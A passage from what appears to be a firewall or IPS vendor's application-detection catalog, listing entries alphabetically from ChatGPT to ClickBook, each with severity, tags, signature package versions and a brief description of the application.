Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Description: ChatGPT is a generative artificial intelligence developed by OpenAI. This detection covers web and application usage.
Back to top

Chatroulette

About this situation: Chatroulette usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to chat online (video, audio, and text) with another visitor who is chosen at random. Source: Wikipedia
Back to top

ChatWork

About this situation: Application ChatWork detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChatWork is an chat, task, video and file-sharing platform that helps teams to collaborate.
Back to top

Cheapair

About this situation: CheapAir usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: CheapAir allows us to book airline tickets.
Back to top

Cheatmasters

About this situation: Cheatmasters usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Cheatscodesguides

About this situation: Cheatscodesguides usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games or obtain information.
Back to top

CheckAppointments

About this situation: Application CheckAppointments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CheckAppointments - online booking software that emails and texts, updates your calendar, takes payments, and sends invoices.
Back to top

CheckBox-Systems

About this situation: Application CheckBox-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CheckBox is a gateway and management system that can manage both wireless and wired clients simultaneously.
Back to top

Checkfront

About this situation: Checkfront usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Checkfront is a cloud-based booking management application and e-commerce platform whose secure back-office application provides a central place to manage business, process reservations and track customers.
Back to top

CheckMarket

About this situation: Application CheckMarket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CheckMarket is a company specialized in enterprise survey solutions. Its product is a web-based survey tool. CheckMarket is an enterprise web-based survey tool.
Back to top

CheckPointSoftwareTechnologies

About this situation: Application CheckPointSoftwareTechnologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CheckPointSoftwareTechnologies is the security vendor company, provides industry solutions and protects customers from cyberattacks. It offers a security architecture defending enterprises' networks to mobile devices with security management.
Back to top

Checkster

About this situation: Application Checkster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Checkster gives human resources, recruiters and hiring managers certainty in new hire activities.
Back to top

Checkvist

About this situation: Checkvist usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: With Checkvist Export and import your data as OPML, text or Markdown to any other editor, and integrate with anything that connects to the web.
Back to top

CheddarGetter

About this situation: Application CheddarGetter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CheddarGetter provides a full-featured, easy-to-use billing a recurring subscription management system so you can accept and track recurring payments, one-time charges, and usage fees.
Back to top

Cheekyflirt

About this situation: cheekyFlirt usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

CHEP

About this situation: Application CHEP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CHEP
Back to top

Cheqbook-Accounting

About this situation: Application Cheqbook-Accounting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cheqbook is automated real-time accounting.
Back to top

Chess

About this situation: Chess usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Chikka-Messenger

About this situation: Chikka Messenger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to send instant messages and Short Message Service (SMS) messages to and from mobile phones or computers. Source: Wikipedia
Back to top

Chillstep

About this situation: Chillstep usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: Chillstep is an internet radio service.
Back to top

Chilton-Investor-Portal

About this situation: Application Chilton-Investor-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chilton Investment Company is a global investment management firm that uses a value-oriented, fundamental research approach to seek capital appreciation for our institutional, foundation
Back to top

China-Proxy

About this situation: China Proxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A service that could potentially allow users to hide or tunnel their online activities; China Proxy
Back to top

Chinaren

About this situation: Chinaren usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-595-5211
Description: Chinaren is a Chinese social networking website that is operated and privately owned by Sohu.com Inc.
Back to top

Chinaren-Chat

About this situation: Chinaren Chat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-595-5211
Description: Chinaren is a Chinese social networking website that is operated and privately owned by Sohu.com Inc. This application covers the Chinaren Chat (or "xiao zhi tiao") events.
Back to top

Chinaren-Mail

About this situation: Chinaren Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-636-5211
Description: Chinaren is a Chinese social networking website that is operated and privately owned by Sohu.com Inc. This application covers the Chinaren Mail events.
Back to top

Chinwag-Jobs

About this situation: Application Chinwag-Jobs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chinwag is a community of digital media and marketing professionals connecting through forums, events, Digital Missions including the latest digital jobs.
Back to top

Chirbit

About this situation: Application Chirbit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chirbit allow - upload mp3, wav, aiff or any other format via web or smartphone and share audio on Twitter, Facebook, or Tumblr.
Back to top

ChiroTouch

About this situation: Application ChiroTouch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChiroTouch is a chiropractic software system for the chiropractic practice.
Back to top

Choicelinx

About this situation: Application Choicelinx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The key product at Choicelinx is Benefits Insight - a proprietary HR Administration portal with an adjacent Employee Online Enrollment system.
Back to top

Chrobrus

About this situation: Application Chrobrus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chrobrus is an HR software company, that delivers solutions based on customer's needs and delivering solution for problems.
Back to top

Chrome-Remote-Desktop

About this situation: Application Chrome-Remote-Desktop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chrome Remote Desktop allows users to remotely access another computer through Chrome browser or a Chromebook.
Back to top

Chrome-River

About this situation: Application Chrome-River detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Chrome River online expense reporting and invoice management service provides complete process automation and cost controls around an organization's accounts payable operations.
Back to top

ChromecastApp

About this situation: Endpoint Context Agent based Chromecast detection
Context: EI Correlation
Severity: 1
Tags: Mobile Software, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: ChromecastApp endpoint application has been detected. ChromecastApp is an application used for casting content to the Chromecast device.
Back to top

Chrometa

About this situation: Application Chrometa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chrometa is a software company that's solving the age-old timekeeping dilemma for billing professionals.
Back to top

Chronotek-Telephone-Timekeeping

About this situation: Application Chronotek-Telephone-Timekeeping detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chronotek is a telephone timekeeping system designed to help manage, track, and report on remote employees. Users clock in by using our 1-800 number, and this data is immediately available via an easy to use web interface. Supervisors may also track employee data from any web enabled mobile device, using the Mobile Chronotek system.
Back to top

Chunkhost

About this situation: Application Chunkhost detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChunkHost offers a virtual private servers
Back to top

Churchteams

About this situation: Application Churchteams detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Churchteams is a cloud ChMS, services
Back to top

ChurchTrac

About this situation: Application ChurchTrac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChurchTrac is a tool that enables you to keep up with your membership, improve communication, and organize your team and ministry.
Back to top

CIBC

About this situation: Application CIBC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CIBC is a financial institution providing a full suite of products and services to clients across Canada and around the world.
Back to top

Cielo

About this situation: Application Cielo detected
Context: Application Context
Severity: 1
Tags: Web Applications, HR
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cielo is a provider of Recruitment Process Outsourcing solutions custom-tailored to your business objectives, industry and culture.
Back to top

Cigna

About this situation: Application Cigna detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cigna is a health services organization. Its insurance subsidiaries are providers of medical, dental, disability, life and accident insurance and related products and services.
Back to top

Cignex

About this situation: Application Cignex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CIGNEX Datamatics an open source consulting company offering enterprise-grade solutions, platforms, products and services for Systems of Engagement and Insight.
Back to top

Cimatron

About this situation: Application Cimatron detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cimatron develops and distributes CAD
Back to top

Cin7

About this situation: Application Cin7 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cin7 is a cloud-based inventory system designed to make the running of your business a breeze. Get the features you need to grow your business without changing your accounting system.
Back to top

Cincom

About this situation: Application Cincom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cincom software helps organizations improve the way they do business, from product configuration and quoting to document solutions programs to business management applications on Microsoft Dynamics AX and CRM.
Back to top

Cinemagram

About this situation: CINEMAGRAM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: is the fastest way to share videos with your friends and family.
Back to top

Cintellate-EHandS-Software

About this situation: Application Cintellate-EHandS-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SAI Global's Cintellate EHandS Software was developed to support an organization's key Environmental, Health and Safety business processes, providing a framework for managing EHandS performance.
Back to top

CipherCloud

About this situation: Application CipherCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CipherCloud provides full-scale enterprise cloud security solutions for cloud monitoring, encryption, key management, malware detection and compliance.
Back to top

Circle

About this situation: Application Circle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Circle is a consumer Internet company focused on transforming the world economy with secure, simple, and less costly technology for storing and using money.
Back to top

CircleCI

About this situation: Application CircleCI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CircleCI - Hosted Continuous Integration for web applications. Set up your application for testing in one click, on the fastest testing platform on the internet.
Back to top

Circonus

About this situation: Application Circonus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Circonus combines monitoring, alerting, event processing, and analytics tools into one unified solution.
Back to top

Cirrus-Insight

About this situation: Application Cirrus-Insight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cirrus Insight is a customer relationship management application that integrates Salesforce with third party services, including Gmail and Microsoft's Office 365.
Back to top

Cisco

About this situation: Application Cisco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1544-5242
Description: Cisco designs, manufactures, and sells networking equipment.
Back to top

Cisco AnyConnect

About this situation: Endpoint Context Agent based Cisco AnyConnect detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Cisco AnyConnect endpoint application has been detected.
Back to top

Cisco-SMI

About this situation: Cisco Smart Install protocol usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1087-5242
Description: Cisco Smart Install is a configuration and image-management feature for Cisco administrators. The feature has been publicly exploited by the Smart Install Exploitation Tool (SIET).
Back to top

Cision

About this situation: Application Cision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cision is the company that provides PR software and services including content marketing, media monitoring, media list building, distribution and analysis.
Back to top

Citibank

About this situation: Citibank usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1764-5242
Description: Citibank usage detected. Citibank is a US based banking corporation.
Back to top

Citizenserve

About this situation: Application Citizenserve detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Citizenserve is a cloud-computing platform that grants you access to fast, secure, and user-friendly e-government solutions.
Back to top

Citrix

About this situation: Application Citrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Citrix provides server, application and desktop virtualization, networking, software-as-a-service, and cloud computing technologies.
Back to top

Citrix GoToMeeting

About this situation: Endpoint Context Agent based Citrix GoToMeeting
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Citrix GoToMeeting endpoint application has been detected.
Back to top

Citrix-ICA

About this situation: Citrix ICA traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-759-5211
Description: ICA is a proprietary protocol used by Citrix Systems for remote application and desktop functionalities.
Back to top

Citrix-Provisioning-Services

About this situation: Citrix Provisioning Services usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-759-5211
Description: Citrix Provisioning Services allows streaming of disk images to create multiple virtual desktops across multiple servers.
Back to top

Citrix-ShareFile

About this situation: Citrix ShareFile usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-1373-5242
Description: Citrix ShareFile is a file sharing service aimed to a corporate and enterprise users.
Back to top

Citrix-XML-Service

About this situation: Citrix XML Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-628-5211
Description: Citrix XML Service is used by Citrix products to launch and control virtualized desktops and applications.
Back to top

CityGrid-Media

About this situation: Application CityGrid-Media detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CityGrid Media is an online media company that connects web and mobile publishers with local advertising organizations by linking them through CityGrid, its local content and advertising network.
Back to top

Citysearch

About this situation: Citysearch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Citysearch provides information about businesses in the categories of dining, entertainment, retail, travel, and professional services in cities throughout the United States.
Back to top

CivicPlus

About this situation: Application CivicPlus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CivicPlus provides government website design, development, content management, and e-government tools and applications.
Back to top

CiviCRM

About this situation: Application CiviCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CiviCRM is open source, Web-based platform that helps organizations realize their missions through fundraising, events management, mass-mail marketing, peer-to-peer campaigns and more via one unified solution.
Back to top

CKBTravel

About this situation: Application CKBTravel detected
Context: Application Context
Severity: 1
Tags: Web Applications, Travel and Expense
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CKBTravel is a service that helps to find the hotel rates and to reserve hotel accommodation or travel service.
Back to top

Clamav-Update-Service

About this situation: ClamAV update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-628-5211
Description: ClamAV is a free antivirus software.
Back to top

Clarify-it

About this situation: Application Clarify-it detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clarify helps you create communications that are organized, brief and clear. Clarify is the perfect tool whenever adding screenshots and pictures would make your communication more clear.
Back to top

Clario

About this situation: Application Clario detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clario reveals insights about your customers, their purchases, and the marketing that drove them.
Back to top

Claritum

About this situation: Application Claritum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Claritum is a cloud spend management platform enables businesses and service providers to gain spend visibility and control of every transaction.
Back to top

Clarity

About this situation: Application Clarity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clarity provides entrepreneurs with business expertise and mentorships.
Back to top

Clarizen

About this situation: Clarizen usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-630-5211
Description: A work management and project management software; Source Wikipedia
Back to top

Claromentis

About this situation: Application Claromentis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Claromentis supplies all organizations regardless of size, location or industry sector with a web-based foundation for their business that offers learning, participation and sharing in support of their evolving business goals. Claromentis provides solutions for information management, business processes, modern collaborative tools and custom applications in a single, well-designed web platform.
Back to top

Classifieds Posting

About this situation: General Function that enables a user to post a classified ad.
Context: URL Application Context
Severity: 1
Tags: Social Web - Various, Productivity Loss
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: General Function that enables a user to post a classified ad.
Back to top

ClassMarker

About this situation: Application ClassMarker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: The ClassMarker is an online testing website, online quiz maker that marks your tests and quizzes for you.
Back to top

Classmates

About this situation: Classmates usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-628-5211
Description: Classmates.com is a social network service that helps members find, connect and keep in touch with friends and acquaintances from throughout their lives including kindergarten, primary school, high school, college, work and the United States military.
Back to top

Clavid

About this situation: Application Clavid detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clavid challenges of professional identity providers to increase the users security level while keeping the usability.
Back to top

CLDAP

About this situation: CLDAP traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-759-5211
Description: Connection-less Lightweight Directory Access Protocol (CLDAP) is a connection-less version of LDAP.
Back to top

Cleanbill-liteBooks

About this situation: Application Cleanbill-liteBooks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CleanBill LITEBOOKS is an online accounting software, offers perform billing and accounting tasks.
Back to top

Clear-View-System

About this situation: Application Clear-View-System detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clear View System develops currency exchange software application for money exchange businesses.
Back to top

Clearbooks-Accounting-Software

About this situation: Application Clearbooks-Accounting-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clear Books Accounting Software is an online accounting system for small businesses.
Back to top

ClearC2

About this situation: Application ClearC2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClearC2 - Enterprise Business Solutions for Customer Relationship Management and Maintenance Management.
Back to top

ClearCheckbook.com

About this situation: Application ClearCheckbook.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClearCheckbook is an application that allows users to track bills, setup reminders and recurring transactions, create spending reports, set budgets and more.
Back to top

ClearDay-Web

About this situation: Application ClearDay-Web detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Thrive is cloud based demand forecasting and inventory replenishment system to distribution intensive companies.
Back to top

Cleardocs

About this situation: Cleardocs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Cleardocs is a simple, effective online legal document service through which you can order and manage legal and related documents. Cleardocs provides fast, ready-to-sign, Australian legal documents online.
Back to top

Clearleap

About this situation: Clearleap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: Clearleap is a multi-screen video processing software.
Back to top

Clearmanage

About this situation: Application Clearmanage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clearmanage is a cloud computing and cloud security service provider specializing in providing cloud services, cloud infrastructure and hosting, and advance security solution and services for government and enterprises.
Back to top

Clearpoint

About this situation: Application Clearpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clearpoint formerly known as CredAbility, serves as a trusted advisor, helping people resolve financial challenges and build economic security for themselves and their families.
Back to top

Clearslide

About this situation: ClearSlide usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This platform allows users to share content and sales materials through email links. Source: Wikipedia
Back to top

Clearspider

About this situation: Application Clearspider detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clear Spider provide collaborative inventory management software on the cloud.
Back to top

ClearVantage

About this situation: Application ClearVantage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ClearVantage - association management software to mid-sized and large member organizations
Back to top

CLEO

About this situation: Application CLEO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CLEO provides solutions for enterprise data integration, enterprise managed file transfer, secure file sharing, and interactive engagement.
Back to top

Clever

About this situation: Application Clever detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clever is a startup working to improve K-12 education. The mission is to make the experience of using technology in the classroom easier for teachers and students.
Back to top

Clever-Cloud

About this situation: Application Clever-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clever Cloud helps developers deploy and run their apps with bulletproof infrastructure.
Back to top

Click2Mail

About this situation: Application Click2Mail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Click2Mail one-stop shop for direct mail and mailing services that meet the needs of small and medium businesses. Everything you need to create postcards, letters, catalogs and more, all online and ready to use.
Back to top

Clickability

About this situation: Application Clickability detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clickability is a software-as-a-service
Back to top

Clickable

About this situation: Application Clickable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Clickable makes marketers thrive by delivering powerful intelligence for social and search advertising. With Clickable, marketers simplify complex data into meaningful metrics and customer insights, and can prove ROI while making more profitable advertising decisions
Back to top

ClickBook

About this situation: Application ClickBook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
